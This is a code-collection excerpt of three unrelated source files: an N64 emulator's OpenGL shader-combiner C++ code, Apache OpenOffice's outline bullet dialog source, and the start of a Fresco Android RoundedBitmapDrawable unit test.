\n"\ " gl_FragColor.a = comb.a; \n"\ "#else \n"\ " gl_FragColor = comb; \n"\ "#endif \n"\ " \n"\ "#ifdef ALPHA_TEST \n"\ ALPHA_TEST "#endif \n"\ "} \n"; //Fragment shader for InitCycleCopy const char *fragmentCopy = "#version " GLSL_VERSION "\n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #else "precision lowp float; \n" #endif "uniform sampler2D uTex0; \n"\ "uniform float AlphaRef; \n"\ "varying lowp vec2 vTexCoord0; \n"\ "void main() \n"\ "{ \n"\ " gl_FragColor = texture2D(uTex0,vTexCoord0).bgra; \n" \ ALPHA_TEST "}"; GLuint copyProgram,copyAlphaLocation; //Fragment shader for InitCycleFill const char *fragmentFill = "#version " GLSL_VERSION "\n" #if !defined(HAVE_OPENGLES2) "#define 
lowp \n" "#define mediump \n" #else "precision lowp float; \n" #endif "uniform vec4 uColor; \n" "void main() \n" "{ \n" " gl_FragColor = uColor; \n" "}"; GLuint fillProgram,fillColorLocation; COGLFragmentShaderCombiner::COGLFragmentShaderCombiner(CRender *pRender) : COGLColorCombiner(pRender) { m_bShaderIsSupported = true; } COGLFragmentShaderCombiner::~COGLFragmentShaderCombiner() { } bool COGLFragmentShaderCombiner::Initialize(void) { if( !COGLColorCombiner::Initialize() ) return false; m_bShaderIsSupported = true; return true; } void COGLFragmentShaderCombiner::InitCombinerCycle12(void) { } void COGLFragmentShaderCombiner::DisableCombiner(void) { COGLColorCombiner::DisableCombiner(); } void COGLFragmentShaderCombiner::InitCombinerCycleCopy(void) { COGLColorCombiner::InitCombinerCycleCopy(); } void COGLFragmentShaderCombiner::InitCombinerCycleFill(void) { COGLColorCombiner::InitCombinerCycleFill(); } void COGLFragmentShaderCombiner::InitCombinerBlenderForSimpleTextureDraw(uint32_t tile) { COGLColorCombiner::InitCombinerBlenderForSimpleTextureDraw(tile); } #ifdef DEBUGGER void COGLFragmentShaderCombiner::DisplaySimpleMuxString(void) { COGLColorCombiner::DisplaySimpleMuxString(); } #endif COGL_FragmentProgramCombiner::COGL_FragmentProgramCombiner(CRender *pRender) : COGLColorCombiner4(pRender) { delete m_pDecodedMux; m_pDecodedMux = new DecodedMuxForPixelShader; m_bFragmentProgramIsSupported = true; m_AlphaRef = 0.0f; bAlphaTestState = false; bAlphaTestPreviousState = false; bFogState = false; bFogPreviousState = false; //Create shaders for fill and copy GLint success; GLuint vs,fs; copyProgram = glCreateProgram(); vs = glCreateShader(GL_VERTEX_SHADER); glShaderSource(vs,1,&vertexShader,NULL); glCompileShader(vs); glGetShaderiv(vs,GL_COMPILE_STATUS,&success); if(!success) { char log[1024]; glGetShaderInfoLog(vs,1024,NULL,log); printf("%s\n",log); } fs = glCreateShader(GL_FRAGMENT_SHADER); glShaderSource(fs,1,&fragmentCopy,NULL); glCompileShader(fs); glGetShaderiv(fs,GL_COMPILE_STATUS,&success); if(!success) { char log[1024]; glGetShaderInfoLog(fs,1024,NULL,log); printf("%s\n",log); } glAttachShader(copyProgram,vs); glAttachShader(copyProgram,fs); glBindAttribLocation(copyProgram,VS_TEXCOORD0,"aTexCoord0"); glBindAttribLocation(copyProgram,VS_POSITION,"aPosition"); glLinkProgram(copyProgram); copyAlphaLocation = glGetUniformLocation(copyProgram,"AlphaRef"); glGetProgramiv(copyProgram,GL_LINK_STATUS,&success); if(!success) { char log[1024]; glGetProgramInfoLog(copyProgram,1024,NULL,log); printf("%s\n",log); } glDeleteShader(fs); //Fill shader fs = glCreateShader(GL_FRAGMENT_SHADER); glShaderSource(fs,1,&fragmentFill,NULL); glCompileShader(fs); glGetShaderiv(fs,GL_COMPILE_STATUS,&success); if(!success) { char log[1024]; glGetShaderInfoLog(fs,1024,NULL,log); printf("%s\n",log); } fillProgram = glCreateProgram(); glAttachShader(fillProgram,vs); glAttachShader(fillProgram,fs); glBindAttribLocation(fillProgram,VS_POSITION,"aPosition"); glLinkProgram(fillProgram); fillColorLocation = glGetUniformLocation(fillProgram,"uColor"); glDeleteShader(fs); glDeleteShader(vs); } COGL_FragmentProgramCombiner::~COGL_FragmentProgramCombiner() { int size = m_vCompiledShaders.size(); for (int i=0; i<size; i++) { GLuint ID = m_vCompiledShaders[i].programID; glDeleteProgram(ID); m_vCompiledShaders[i].programID = 0; } m_vCompiledShaders.clear(); } bool COGL_FragmentProgramCombiner::Initialize(void) { m_bFragmentProgramIsSupported = true; return true; } void COGL_FragmentProgramCombiner::UseProgram(GLuint program) { 
if (program != currentProgram) { glUseProgram(program); currentProgram = program; } } void COGL_FragmentProgramCombiner::DisableCombiner(void) { } void COGL_FragmentProgramCombiner::InitCombinerCycleCopy(void) { m_pOGLRender->DisableMultiTexture(); m_pOGLRender->EnableTexUnit(0, true); UseProgram(copyProgram); glUniform1f(copyAlphaLocation,m_AlphaRef); glEnableVertexAttribArray(VS_POSITION); glEnableVertexAttribArray(VS_TEXCOORD0); glDisableVertexAttribArray(VS_COLOR); glDisableVertexAttribArray(VS_TEXCOORD1); glDisableVertexAttribArray(VS_FOG); COGLTexture* pTexture = g_textures[gRSP.curTile].m_pCOGLTexture; if( pTexture ) { m_pOGLRender->BindTexture(pTexture->m_dwTextureName, 0); m_pOGLRender->SetTexelRepeatFlags(gRSP.curTile); } } void COGL_FragmentProgramCombiner::InitCombinerCycleFill(void) { UseProgram(fillProgram); glUniform4f(fillColorLocation,((gRDP.fillColor>>16)&0xFF)/255.0f,((gRDP.fillColor>>8)&0xFF)/255.0f,((gRDP.fillColor)&0xFF)/255.0f,((gRDP.fillColor>>24)&0xFF)/255.0f); } #ifdef BGR_SHADER const char *muxToFP_Maps[][2] = { //color -- alpha {"vec3(0.0)", "0.0"}, //MUX_0 = 0, {"vec3(1.0)", "1.0"}, //MUX_1, {"comb.rgb", "comb.a"}, //MUX_COMBINED, {"t0.rgb", "t0.a"}, //MUX_TEXEL0, {"t1.rgb", "t1.a"}, //MUX_TEXEL1, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV, {"comb.rgb", "comb.a"}, //MUX_COMBALPHA, {"t0.rgb", "t0.a"}, //MUX_T0_ALPHA, {"t1.rgb", "t1.a"}, //MUX_T1_ALPHA, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM_ALPHA, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE_ALPHA, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV_ALPHA, {"EnvFrac.a", "EnvFrac.a"}, //MUX_LODFRAC, {"PrimFrac.a", "PrimFrac.a"}, //MUX_PRIMLODFRAC, {"vec3(1.0)", "1.0"}, //MUX_K5, {"vec3(1.0)", "1.0"}, //MUX_UNK, // Should not be used }; #else const char *muxToFP_Maps[][2] = { //color -- alpha {"vec3(0.0)", "0.0"}, //MUX_0 = 0, {"vec3(1.0)", "1.0"}, //MUX_1, {"comb.rgb", "comb.a"}, //MUX_COMBINED, {"t0.bgr", "t0.a"}, //MUX_TEXEL0, {"t1.bgr", "t1.a"}, //MUX_TEXEL1, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV, {"comb.rgb", "comb.a"}, //MUX_COMBALPHA, {"t0.bgr", "t0.a"}, //MUX_T0_ALPHA, {"t1.bgr", "t1.a"}, //MUX_T1_ALPHA, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM_ALPHA, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE_ALPHA, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV_ALPHA, {"EnvFrac.a", "EnvFrac.a"}, //MUX_LODFRAC, {"PrimFrac.a", "PrimFrac.a"}, //MUX_PRIMLODFRAC, {"vec3(1.0)", "1.0"}, //MUX_K5, {"vec3(1.0)", "1.0"}, //MUX_UNK, // Should not be used }; #endif char oglNewFP[4092]; char* MuxToOC(uint8_t val) { // For color channel if( val&MUX_ALPHAREPLICATE ) return (char*)muxToFP_Maps[val&0x1F][1]; else return (char*)muxToFP_Maps[val&0x1F][0]; } char* MuxToOA(uint8_t val) { // For alpha channel return (char*)muxToFP_Maps[val&0x1F][1]; } static void CheckFpVars(uint8_t MuxVar, bool &bNeedT0, bool &bNeedT1) { MuxVar &= 0x1f; if (MuxVar == MUX_TEXEL0 || MuxVar == MUX_T0_ALPHA) bNeedT0 = true; if (MuxVar == MUX_TEXEL1 || MuxVar == MUX_T1_ALPHA) bNeedT1 = true; } void COGL_FragmentProgramCombiner::GenerateProgramStr() { DecodedMuxForPixelShader &mux = *(DecodedMuxForPixelShader*)m_pDecodedMux; mux.splitType[0] = mux.splitType[1] = mux.splitType[2] = mux.splitType[3] = CM_FMT_TYPE_NOT_CHECKED; m_pDecodedMux->Reformat(false); char tempstr[500], newFPBody[4092]; bool bNeedT0 = false, bNeedT1 = false, bNeedComb2 = false; newFPBody[0] = 
0; for( int cycle=0; cycle<2; cycle++ ) { for( int channel=0; channel<2; channel++) { char* (*func)(uint8_t) = channel==0?MuxToOC:MuxToOA; char *dst = channel==0?(char*)"rgb":(char*)"a"; N64CombinerType &m = mux.m_n64Combiners[cycle*2+channel]; switch( mux.splitType[cycle*2+channel] ) { case CM_FMT_TYPE_NOT_USED: tempstr[0] = 0; break; case CM_FMT_TYPE_D: sprintf(tempstr, "comb.%s = %s;\n", dst, func(m.d)); CheckFpVars(m.d, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_MOD_C: sprintf(tempstr, "comb.%s = %s * %s;\n", dst, func(m.a), func(m.c)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_ADD_D: sprintf(tempstr, "comb.%s = saturate(%s + %s);\n", dst, func(m.a), func(m.d)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.d, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_SUB_B: sprintf(tempstr, "comb.%s = %s - %s;\n", dst, func(m.a), func(m.b)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.b, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_MOD_C_ADD_D: sprintf(tempstr, "comb.%s = saturate(%s * %s + %s);\n", dst, func(m.a), func(m.c),func(m.d)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); CheckFpVars(m.d, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_LERP_B_C: //ARB ASM LERP and mix have different parameter ordering. //sprintf(tempstr, "comb.%s = saturate(mix(%s, %s, %s));\n", dst,func(m.a),func(m.b), func(m.c)); sprintf(tempstr, "comb.%s = (%s - %s) * %s + %s;\n", dst,func(m.a),func(m.b), func(m.c),func(m.b)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.b, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); //sprintf(tempstr, "SUB comb.%s, %s, %s;\nMAD_SAT comb.%s, comb, %s, %s;\n", dst, func(m.a), func(m.b), dst, func(m.c), func(m.b)); break; default: sprintf(tempstr, "comb2.%s = %s - %s;\ncomb.%s = saturate(comb2.%s * %s + %s);\n", dst, func(m.a), func(m.b), dst,dst, func(m.c),func(m.d)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.b, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); CheckFpVars(m.d, bNeedT0, bNeedT1); bNeedComb2 = true; break; } strcat(newFPBody, tempstr); } } oglNewFP[0] = 0; if (bNeedT0) strcat(oglNewFP, "#define NEED_TEX0\n"); if (bNeedT1) strcat(oglNewFP, "#define NEED_TEX1\n"); strcat(oglNewFP, fragmentHeader); strcat(oglNewFP, newFPBody); strcat(oglNewFP, fragmentFooter); } int COGL_FragmentProgramCombiner::ParseDecodedMux() { OGLShaderCombinerSaveType res; GLint success; if(vertexProgram == 9999) { vertexProgram = res.vertexShaderID = glCreateShader(GL_VERTEX_SHADER); glShaderSource(res.vertexShaderID, 1, &vertexShader,NULL); glCompileShader(res.vertexShaderID); } else { res.vertexShaderID = vertexProgram; } //Create 4 shaders, with and without alphatest + with and without fog GenerateProgramStr(); for(int alphaTest = 0;alphaTest < 2;alphaTest++) { for(int fog = 0; fog < 2; fog++) { res.fragmentShaderID = glCreateShader(GL_FRAGMENT_SHADER); char* tmpShader = (char*)malloc(sizeof(char) * 4096); strcpy(tmpShader,"#version " GLSL_VERSION "\n"); if(alphaTest == 1) strcat(tmpShader,"#define ALPHA_TEST\n"); if(fog == 1) strcat(tmpShader,"#define FOG\n"); res.fogIsUsed = fog == 1; res.alphaTest = alphaTest == 1; strcat(tmpShader,oglNewFP); glShaderSource(res.fragmentShaderID, 1,(const char**) &tmpShader,NULL); free(tmpShader); glCompileShader(res.fragmentShaderID); glGetShaderiv(res.fragmentShaderID, GL_COMPILE_STATUS, &success); if (!success) { char Log[1024]; GLint nLength; glGetShaderInfoLog(res.fragmentShaderID, 1024, &nLength, Log); printf("Error compiling shader!\n 
%s",oglNewFP); printf("%s", Log); } res.programID = glCreateProgram(); glAttachShader(res.programID,res.vertexShaderID); glAttachShader(res.programID,res.fragmentShaderID); //Bind Attributes glBindAttribLocation(res.programID,VS_COLOR,"aColor"); glBindAttribLocation(res.programID,VS_TEXCOORD0,"aTexCoord0"); glBindAttribLocation(res.programID,VS_TEXCOORD1,"aTexCoord1"); glBindAttribLocation(res.programID,VS_POSITION,"aPosition"); glBindAttribLocation(res.programID,VS_FOG,"aFogCoord"); glLinkProgram(res.programID); glGetProgramiv(res.programID, GL_LINK_STATUS, &success); if (!success) { char Log[1024]; GLint nLength; glGetShaderInfoLog(res.fragmentShaderID, 1024, &nLength, Log); printf("Error linking program!\n"); printf("%s\n",Log); } UseProgram(res.programID); //Bind texture samplers GLint tex0 = glGetUniformLocation(res.programID,"uTex0"); GLint tex1 = glGetUniformLocation(res.programID,"uTex1"); if(tex0 != -1) glUniform1i(tex0,0); if(tex1 != -1) glUniform1i(tex1,1); //Bind Uniforms res.PrimColorLocation = glGetUniformLocation(res.programID,"PrimColor"); res.EnvColorLocation = glGetUniformLocation(res.programID,"EnvColor"); res.PrimFracLocation = glGetUniformLocation(res.programID,"PrimFrac"); res.EnvFracLocation = glGetUniformLocation(res.programID,"EnvFrac"); res.AlphaRefLocation = glGetUniformLocation(res.programID,"AlphaRef"); res.FogColorLocation = glGetUniformLocation(res.programID,"FogColor"); res.FogMinMaxLocation = glGetUniformLocation(res.programID,"FogMinMax"); res.dwMux0 = m_pDecodedMux->m_dwMux0; res.dwMux1 = m_pDecodedMux->m_dwMux1; m_vCompiledShaders.push_back(res); } } m_lastIndex = m_vCompiledShaders.size()-4; return m_lastIndex; } void COGL_FragmentProgramCombiner::GenerateCombinerSetting(int index) { GLuint ID = m_vCompiledShaders[index].programID; UseProgram(ID); glEnableVertexAttribArray(VS_POSITION); glVertexAttribPointer(VS_POSITION,4,GL_FLOAT,GL_FALSE,sizeof(float)*5,&(g_vtxProjected5[0][0])); glEnableVertexAttribArray(VS_TEXCOORD0); glVertexAttribPointer(VS_TEXCOORD0,2,GL_FLOAT,GL_FALSE, sizeof( TLITVERTEX ), &(g_vtxBuffer[0].tcord[0].u)); glEnableVertexAttribArray(VS_TEXCOORD1); glVertexAttribPointer(VS_TEXCOORD1,2,GL_FLOAT,GL_FALSE, sizeof( TLITVERTEX ), &(g_vtxBuffer[0].tcord[1].u)); glEnableVertexAttribArray(VS_COLOR); glVertexAttribPointer(VS_COLOR, 4, GL_UNSIGNED_BYTE,GL_TRUE, sizeof(uint8_t)*4, &(g_oglVtxColors[0][0]) ); glEnableVertexAttribArray(VS_FOG); glVertexAttribPointer(VS_FOG, 1, GL_FLOAT,GL_FALSE, sizeof(float)*5, &(g_vtxProjected5[0][4]) ); } void COGL_FragmentProgramCombiner::GenerateCombinerSettingConstants(int index) { OGLShaderCombinerSaveType &prog = m_vCompiledShaders[index]; UseProgram(prog.programID); float *pf; if(prog.EnvColorLocation != -1) { pf = GetEnvColorfv(); if (memcmp(pf, prog.EnvColors, sizeof(prog.EnvColors))) { memcpy(prog.EnvColors, pf, sizeof(prog.EnvColors)); glUniform4fv(prog.EnvColorLocation, 1, pf); } } if(prog.PrimColorLocation != -1) { pf = GetPrimitiveColorfv(); if (memcmp(pf, prog.PrimColors, sizeof(prog.PrimColors))) { memcpy(prog.PrimColors, pf, sizeof(prog.PrimColors)); glUniform4fv(prog.PrimColorLocation, 1, pf); } } if(prog.EnvFracLocation != -1) { // avoid slow float compare.. 
if( *(int *)&gRDP.LODFrac != *(int *)&prog.EnvLODFrac ) { float frac = gRDP.LODFrac / 255.0f; float tempf[4] = {frac,frac,frac,frac}; prog.EnvLODFrac = (float)gRDP.LODFrac; glUniform4fv(prog.EnvFracLocation, 1, tempf); } } if(prog.PrimFracLocation != -1) { if( *(int *)&gRDP.primLODFrac != *(int *)&prog.PrimLODFrac ) { float frac2 = gRDP.primLODFrac / 255.0f; float tempf2[4] = {frac2,frac2,frac2,frac2}; prog.PrimLODFrac = (float)gRDP.primLODFrac; glUniform4fv(prog.PrimFracLocation, 1, tempf2); } } if(prog.FogColorLocation != -1) { pf = &gRDP.fvFogColor[0]; if (memcmp(pf, prog.FogColors, sizeof(prog.FogColors))) { memcpy(prog.FogColors, pf, sizeof(prog.FogColors)); glUniform4fv(prog.FogColorLocation, 1, pf); } } if(prog.FogMinMaxLocation != -1) { if( gRSPfFogMin != prog.FogMin || gRSPfFogMax != prog.FogMax ) { prog.FogMin = gRSPfFogMin; prog.FogMax = gRSPfFogMax; glUniform2f(prog.FogMinMaxLocation,gRSPfFogMin,gRSPfFogMax); } } if(prog.AlphaRefLocation != -1) { if( m_AlphaRef != prog.AlphaRef ) { prog.AlphaRef = m_AlphaRef; glUniform1f(prog.AlphaRefLocation, m_AlphaRef); } } } int COGL_FragmentProgramCombiner::FindCompiledMux() { #ifdef DEBUGGER if( debuggerDropCombiners ) { m_vCompiledShaders.clear(); //m_dwLastMux0 = m_dwLastMux1 = 0; debuggerDropCombiners = false; } #endif for( uint32_t i=0; i<m_vCompiledShaders.size(); i++ ) { if( m_vCompiledShaders[i].dwMux0 == m_pDecodedMux->m_dwMux0 && m_vCompiledShaders[i].dwMux1 == m_pDecodedMux->m_dwMux1 && m_vCompiledShaders[i].fogIsUsed == bFogState && m_vCompiledShaders[i].alphaTest == bAlphaTestState) { return (int)i; } } return -1; } ////////////////////////////////////////////////////////////////////////// void COGL_FragmentProgramCombiner::InitCombinerCycle12(void) { #ifdef DEBUGGER if( debuggerDropCombiners ) { UpdateCombiner(m_pDecodedMux->m_dwMux0,m_pDecodedMux->m_dwMux1); m_vCompiledShaders.clear(); m_dwLastMux0 = m_dwLastMux1 = 0; debuggerDropCombiners = false; } #endif m_pOGLRender->EnableMultiTexture(); bool combinerIsChanged = false; if( m_pDecodedMux->m_dwMux0 != m_dwLastMux0 || m_pDecodedMux->m_dwMux1 != m_dwLastMux1 || bAlphaTestState != bAlphaTestPreviousState || bFogState != bFogPreviousState || m_lastIndex < 0 ) { combinerIsChanged = true; m_lastIndex = FindCompiledMux(); if( m_lastIndex < 0 ) // Can not found { m_lastIndex = ParseDecodedMux(); } m_dwLastMux0 = m_pDecodedMux->m_dwMux0; m_dwLastMux1 = m_pDecodedMux->m_dwMux1; bAlphaTestPreviousState = bAlphaTestState; bFogPreviousState = bFogState; m_AlphaRef = (float)(m_pOGLRender->m_dwAlpha) / 255.0f; } GenerateCombinerSettingConstants(m_lastIndex); if( m_bCycleChanged || combinerIsChanged || gRDP.texturesAreReloaded || gRDP.colorsAreReloaded ) { if( m_bCycleChanged || combinerIsChanged ) { GenerateCombinerSettingConstants(m_lastIndex); GenerateCombinerSetting(m_lastIndex); } else if( gRDP.colorsAreReloaded ) { GenerateCombinerSettingConstants(m_lastIndex); } m_pOGLRender->SetAllTexelRepeatFlag(); gRDP.colorsAreReloaded = false; gRDP.texturesAreReloaded = false; } else { m_pOGLRender->SetAllTexelRepeatFlag(); } } #ifdef DEBUGGER void COGL_FragmentProgramCombiner::DisplaySimpleMuxString(void) { COGLColorCombiner::DisplaySimpleMuxString(); DecodedMuxForPixelShader &mux = *(DecodedMuxForPixelShader*)m_pDecodedMux; mux.Reformat(false); GenerateProgramStr(); //sprintf(oglNewFP, oglFP, // MuxToOC(mux.aRGB0), MuxToOC(mux.bRGB0), MuxToOC(mux.cRGB0), MuxToOC(mux.dRGB0), // MuxToOA(mux.aA0), MuxToOA(mux.bA0), MuxToOA(mux.cA0), MuxToOA(mux.dA0), // MuxToOC(mux.aRGB1), MuxToOC(mux.bRGB1), 
MuxToOC(mux.cRGB1), MuxToOC(mux.dRGB1), // MuxToOA(mux.aA1), MuxToOA(mux.bA1), MuxToOA(mux.cA1), MuxToOA(mux.dA1) // ); TRACE0("OGL Fragment Program:"); TRACE0(oglNewFP); } #endif
16,539
679
<reponame>Grosskopf/openoffice /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ // MARKER(update_precomp.py): autogen include statement, do not remove #include "precompiled_sd.hxx" #ifdef SD_DLLIMPLEMENTATION #undef SD_DLLIMPLEMENTATION #endif #include "OutlineBulletDlg.hxx" #ifndef _SVX_SVXIDS_HRC #include <svx/svxids.hrc> #endif #include <sfx2/objsh.hxx> #include <svx/drawitem.hxx> #include <editeng/bulitem.hxx> #include <editeng/eeitem.hxx> #include <editeng/numitem.hxx> #include <svx/dialogs.hrc> #include <svl/intitem.hxx> #include <svx/svdmark.hxx> #include "View.hxx" #include <svx/svdobj.hxx> #include <svl/style.hxx> #include <drawdoc.hxx> #ifndef _SD_SDRESID_HXX #include "sdresid.hxx" #endif #include "glob.hrc" #include "dlgolbul.hrc" #include "bulmaper.hxx" #include "DrawDocShell.hxx" #include <svx/svxids.hrc> #include <svl/aeitem.hxx> namespace sd { /************************************************************************* |* |* Konstruktor des Tab-Dialogs: Fuegt die Seiten zum Dialog hinzu |* \************************************************************************/ OutlineBulletDlg::OutlineBulletDlg( ::Window* pParent, const SfxItemSet* pAttr, ::sd::View* pView ) : SfxTabDialog ( pParent, SdResId(TAB_OUTLINEBULLET) ), aInputSet ( *pAttr ), bTitle ( sal_False ), pSdView ( pView ) { FreeResource(); aInputSet.MergeRange( SID_PARAM_NUM_PRESET, SID_PARAM_CUR_NUM_LEVEL ); aInputSet.Put( *pAttr ); pOutputSet = new SfxItemSet( *pAttr ); pOutputSet->ClearItem(); sal_Bool bOutliner = sal_False; // Sonderbehandlung wenn eine Title Objekt selektiert wurde if( pView ) { const SdrMarkList& rMarkList = pView->GetMarkedObjectList(); const sal_uLong nCount = rMarkList.GetMarkCount(); for(sal_uLong nNum = 0; nNum < nCount; nNum++) { SdrObject* pObj = rMarkList.GetMark(nNum)->GetMarkedSdrObj(); if( pObj->GetObjInventor() == SdrInventor ) { switch(pObj->GetObjIdentifier()) { case OBJ_TITLETEXT: bTitle = sal_True; break; case OBJ_OUTLINETEXT: bOutliner = sal_True; break; } } } } if( SFX_ITEM_SET != aInputSet.GetItemState(EE_PARA_NUMBULLET)) { const SvxNumBulletItem *pItem = NULL; if(bOutliner) { SfxStyleSheetBasePool* pSSPool = pView->GetDocSh()->GetStyleSheetPool(); String aStyleName((SdResId(STR_LAYOUT_OUTLINE))); aStyleName.AppendAscii( RTL_CONSTASCII_STRINGPARAM( " 1" ) ); SfxStyleSheetBase* pFirstStyleSheet = pSSPool->Find( aStyleName, SD_STYLE_FAMILY_PSEUDO); if( pFirstStyleSheet ) pFirstStyleSheet->GetItemSet().GetItemState(EE_PARA_NUMBULLET, sal_False, (const SfxPoolItem**)&pItem); } if( pItem == NULL ) pItem = (SvxNumBulletItem*) aInputSet.GetPool()->GetSecondaryPool()->GetPoolDefaultItem(EE_PARA_NUMBULLET); DBG_ASSERT( pItem, "Kein 
EE_PARA_NUMBULLET im Pool! [CL]" ); aInputSet.Put(*pItem, EE_PARA_NUMBULLET); } /* debug if( SFX_ITEM_SET == aInputSet.GetItemState(EE_PARA_NUMBULLET, sal_False, &pItem )) { SvxNumRule& rItem = *((SvxNumBulletItem*)pItem)->GetNumRule(); for( int i = 0; i < 9; i++ ) { SvxNumberFormat aNumberFormat = rItem.GetLevel(i); } } */ if(bTitle && aInputSet.GetItemState(EE_PARA_NUMBULLET,sal_True) == SFX_ITEM_ON ) { SvxNumBulletItem* pItem = (SvxNumBulletItem*)aInputSet.GetItem(EE_PARA_NUMBULLET,sal_True); SvxNumRule* pRule = pItem->GetNumRule(); if(pRule) { SvxNumRule aNewRule( *pRule ); aNewRule.SetFeatureFlag( NUM_NO_NUMBERS, sal_True ); SvxNumBulletItem aNewItem( aNewRule, EE_PARA_NUMBULLET ); aInputSet.Put(aNewItem); } } SetInputSet( &aInputSet ); if(!bTitle) AddTabPage(RID_SVXPAGE_PICK_SINGLE_NUM); else RemoveTabPage( RID_SVXPAGE_PICK_SINGLE_NUM ); AddTabPage( RID_SVXPAGE_PICK_BULLET ); AddTabPage( RID_SVXPAGE_PICK_BMP ); AddTabPage(RID_SVXPAGE_NUM_OPTIONS ); AddTabPage(RID_SVXPAGE_NUM_POSITION ); } OutlineBulletDlg::~OutlineBulletDlg() { delete pOutputSet; } void OutlineBulletDlg::PageCreated( sal_uInt16 nId, SfxTabPage &rPage ) { switch ( nId ) { case RID_SVXPAGE_NUM_OPTIONS: { if( pSdView ) { FieldUnit eMetric = pSdView->GetDoc()->GetUIUnit(); SfxAllItemSet aSet(*(GetInputSetImpl()->GetPool())); aSet.Put ( SfxAllEnumItem(SID_METRIC_ITEM,(sal_uInt16)eMetric)); rPage.PageCreated(aSet); } } break; case RID_SVXPAGE_NUM_POSITION: { if( pSdView ) { FieldUnit eMetric = pSdView->GetDoc()->GetUIUnit(); SfxAllItemSet aSet(*(GetInputSetImpl()->GetPool())); aSet.Put ( SfxAllEnumItem(SID_METRIC_ITEM,(sal_uInt16)eMetric)); rPage.PageCreated(aSet); } } break; } } const SfxItemSet* OutlineBulletDlg::GetOutputItemSet() const { SfxItemSet aSet( *SfxTabDialog::GetOutputItemSet() ); pOutputSet->Put( aSet ); const SfxPoolItem *pItem = NULL; if( SFX_ITEM_SET == pOutputSet->GetItemState(pOutputSet->GetPool()->GetWhich(SID_ATTR_NUMBERING_RULE), sal_False, &pItem )) { SdBulletMapper::MapFontsInNumRule( *((SvxNumBulletItem*)pItem)->GetNumRule(), *pOutputSet ); /* #i35937# SfxUInt16Item aBulletState( EE_PARA_BULLETSTATE, 1 ); pOutputSet->Put(aBulletState); */ } /* #i35937# SdBulletMapper::PostMapNumBulletForDialog( *pOutputSet ); */ if(bTitle && pOutputSet->GetItemState(EE_PARA_NUMBULLET,sal_True) == SFX_ITEM_ON ) { SvxNumBulletItem* pBulletItem = (SvxNumBulletItem*)pOutputSet->GetItem(EE_PARA_NUMBULLET,sal_True); SvxNumRule* pRule = pBulletItem->GetNumRule(); if(pRule) pRule->SetFeatureFlag( NUM_NO_NUMBERS, sal_False ); } return pOutputSet; } } // end of namespace sd
2,793
18,965
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ package com.facebook.drawee.drawable; import static org.junit.Assert.*; import static org.mockito.Mockito.*; import android.content.res.Resources; import android.graphics.Bitmap; import android.graphics.ColorFilter; import android.graphics.Paint; import android.graphics.drawable.BitmapDrawable; import android.graphics.drawable.Drawable; import android.util.DisplayMetrics; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.robolectric.RobolectricTestRunner; @RunWith(RobolectricTestRunner.class) public class RoundedBitmapDrawableTest { private Resources mResources; private Bitmap mBitmap; private DisplayMetrics mDisplayMetrics; RoundedBitmapDrawable mRoundedBitmapDrawable; RoundedBitmapDrawable mRoundedBitmapDrawableWithNullBitmap; private final Drawable.Callback mCallback = mock(Drawable.Callback.class); @Before public void setUp() { mResources = mock(Resources.class); mBitmap = mock(Bitmap.class); mDisplayMetrics = mock(DisplayMetrics.class); when(mResources.getDisplayMetrics()).thenReturn(mDisplayMetrics); mRoundedBitmapDrawable = new RoundedBitmapDrawable(mResources, mBitmap); mRoundedBitmapDrawable.setCallback(mCallback); mRoundedBitmapDrawableWithNullBitmap = new RoundedBitmapDrawable(mResources, null); mRoundedBitmapDrawable.setCallback(mCallback); } @Test public void testSetCircle() { mRoundedBitmapDrawable.setCircle(true); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertTrue(mRoundedBitmapDrawable.isCircle()); } @Test public void testSetRadii() { mRoundedBitmapDrawable.setRadii(new float[] {1, 2, 3, 4, 5, 6, 7, 8}); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertArrayEquals(new float[] {1, 2, 3, 4, 5, 6, 7, 8}, mRoundedBitmapDrawable.getRadii(), 0); } @Test public void testSetRadius() { mRoundedBitmapDrawable.setRadius(9); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertArrayEquals(new float[] {9, 9, 9, 9, 9, 9, 9, 